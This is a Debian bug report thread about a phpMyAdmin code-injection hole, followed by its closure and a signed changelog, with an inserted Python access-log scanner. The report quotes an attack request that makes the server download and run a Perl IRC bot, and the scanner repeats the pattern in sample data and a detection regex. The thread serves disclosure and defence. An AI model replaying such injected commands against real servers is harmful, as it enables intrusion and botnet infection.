Your message dated Sun, 25 Oct 2009 19:57:41 +0000
with message-id <e1n29dh-0001sy...@ries.debian.org>
and subject line Bug#535044: fixed in phpmyadmin 4:2.11.8.1-5+lenny3
has caused the Debian Bug report #535044,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole
Hi,
After looking at my logs, I noticed a lot of attempts to break into
phpmyadmin through the following kind of URL:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&
It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit. It is basically an IRC bot.
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2 1.5.24 Debian configuration management sy
ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii perl 5.10.0-19 Larry Wall's Practical Extraction
ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-mcrypt 5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5
Versions of packages phpmyadmin recommends:
ii apache2 2.2.9-10+lenny3 Apache HTTP Server metapackage
ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n
ii php5-gd 5.2.6.dfsg.1-1+lenny3 GD module for php5
Versions of packages phpmyadmin suggests:
ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries
-- debconf information:
phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
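The request quoted in the report above is the kind of thing an administrator wants to pick out of an access log before the setup script is patched: a direct request for config.inc.php (with the doubled slashes that defeat a naive literal match) whose parameter value is a shell pipeline rather than data. The following log scanner is an added example written for this thread; it is not code from the reporter, from phpMyAdmin or from Debian. The sample log lines are constructed (IPs from RFC 5737 documentation ranges; the first line only copies the shape of the reporter's request), and the list of watched script names (config.inc.php, scripts/setup.php) is an assumption chosen from what the report and the changelog mention.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample access-log lines (Apache combined format). They are not
# from the original report: IPs use RFC 5737 documentation ranges, but the
# first request copies the shape of the one the reporter quoted.
SAMPLE_LOG = """\
192.0.2.77 - - [29/Jun/2009:03:32:31 +0200] "GET //phpmyadmin//config.inc.php?c=wget%20http://198.51.100.9/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null& HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.12 - - [29/Jun/2009:08:12:01 +0200] "GET /phpmyadmin/index.php?db=test HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.34 - - [29/Jun/2009:09:40:17 +0200] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Fields of a common/combined log line that the scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Assumed (not from the page): script names whose direct request in production
# deserves a look. config.inc.php is the one the report names; scripts/setup.php
# is the 2.11-era setup script the changelog entry refers to.
WATCHED_SCRIPTS = ('config.inc.php', 'scripts/setup.php')

# Decoded parameter values that look like a shell pipeline rather than data.
SHELL_MARKERS = re.compile(
    r'(?:^|[;&|\s])(?:wget|curl|perl|bash)\b'  # downloader/interpreter names
    r'|[;|`]|\$\(|>>'                          # separators, substitution, redirection
)


def parse_line(line):
    """Return the fields of one log line, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def split_target(target):
    """Split a request target into a normalized path and its raw query string.

    Doubled slashes are collapsed and the path is percent-decoded, so that
    '//phpmyadmin//config.inc.php' and '/phpmyadmin/config.inc.php' compare
    equal; a literal string match on the latter would miss the former.
    """
    raw_path, _, query = target.partition('?')
    path = re.sub(r'/+', '/', unquote(raw_path))
    return path, query


def query_params(query):
    """Yield (key, decoded value) pairs, splitting only on '&'.

    Deliberately not urllib.parse.parse_qs: older Python versions also split
    on ';', which would cut a value like 'wget ...;perl ...' in two.
    """
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        yield unquote_plus(key), unquote_plus(value)


def classify(entry):
    """Return the list of reasons an entry is suspicious (empty if none)."""
    path, query = split_target(entry['target'])
    reasons = []
    if path.endswith(WATCHED_SCRIPTS):
        reasons.append('direct request for setup/config script: ' + path)
    hits = [key for key, value in query_params(query) if SHELL_MARKERS.search(value)]
    if hits:
        reasons.append('shell-like payload in parameter(s): ' + ', '.join(hits))
    return reasons


def scan(log_text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if not reasons:
            continue
        findings.append({
            'ip': entry['ip'],
            'ts': entry['ts'],
            'status': entry['status'],
            # A watched script plus a shell payload is the pattern from the
            # report; either one alone is still worth a second look.
            'severity': 'high' if len(reasons) == 2 else 'medium',
            'reasons': reasons,
        })
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['ts']} status={f['status']}")
        for r in f['reasons']:
            print('       -', r)
```

Run against a real log with scan(open('/var/log/apache2/access.log').read()). The status code kept in each finding is the part to read first: a 404 means the script was not reachable at that path, while a 200 on config.inc.php or the setup script means the request was served and the host should be checked for the /tmp payload and outbound IRC connections the reporter describes.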
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.11.8.1-5+lenny3
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz
phpmyadmin_2.11.8.1-5+lenny3.dsc
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc
phpmyadmin_2.11.8.1-5+lenny3_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 535...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thijs Kinkhorst <th...@debian.org> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sun, 25 Oct 2009 12:30:40 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.11.8.1-5+lenny3
Distribution: stable-security
Urgency: high
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Thijs Kinkhorst <th...@debian.org>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460 552194
Changes:
phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low
.
* Correct some documentation issues of new script.
.
phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high
.
* Upload to stable to fix security issues.
* Fixes XSS and SQL injection (Closes: #552194).
[PMASA-2009-6, CVE-2009-3696, CVE-2009-3697]
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
e73e24d04b0c73386de7ae4e112227d17eae7d98 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
c90b5b5168330a0a8e4eeba1c0aea405e7e1a472 2883628 phpmyadmin_2.11.8.1-5+lenny3_all.deb
Checksums-Sha256:
7d53fc216fd8b99ea440b72870ff018527b189cce5242618e4baeb2853123ff2 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
e5fc26908652779a12d91652ac2c270c583b1922a338139b9a231cee910911bd 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
ae37df4ffc3f6f8c1365d589edd8a255a37ddc1d97b0e9ea0752db72d3a9d7d3 2883628 phpmyadmin_2.11.8.1-5+lenny3_all.deb
Files:
db7c29dbd8ad5758ea8283ebbde9c611 1547 web extra phpmyadmin_2.11.8.1-5+lenny3.dsc
a3c38a698e954534517a81570e9fc9fa 63773 web extra phpmyadmin_2.11.8.1-5+lenny3.diff.gz
da6a70575f8ae6608910a1c5aaf81f1c 2883628 web extra phpmyadmin_2.11.8.1-5+lenny3_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJK5DiKAAoJECIIoQCMVaAcUOsH/iW+RHo9EJjjiuBmz6/T/quz
TxeSQiporVxM2ibMcdU8Xa5KecrQxwkAU5gtzdusoe6Xe+Tr8twgch2T1pl/mqmO
vIpZrLrnwsr+Pb5ofH1jpB5FcIc//GcJ81gQ9y7Vf54Dj2j1tZ1iVc+ViWrIhRBC
1bLKP4UXs6MnC2QHa6agIoOliwuD1FJMRtn4RRe9emV6ReBXno3x0MvJULlxE0C7
aVdN9pd05bf8NQfl9Gk+QqimQqNuQZE/PNdSl+XuzIaY0BBBvZEYq7J3VgEsINNU
Mze8qQKSdXEbNcDbF/LyfRwNo1LYcygg06P0lRI8chML8To7yHHq7BuGFmFToNA=
=fYxY
-----END PGP SIGNATURE-----
--- End Message ---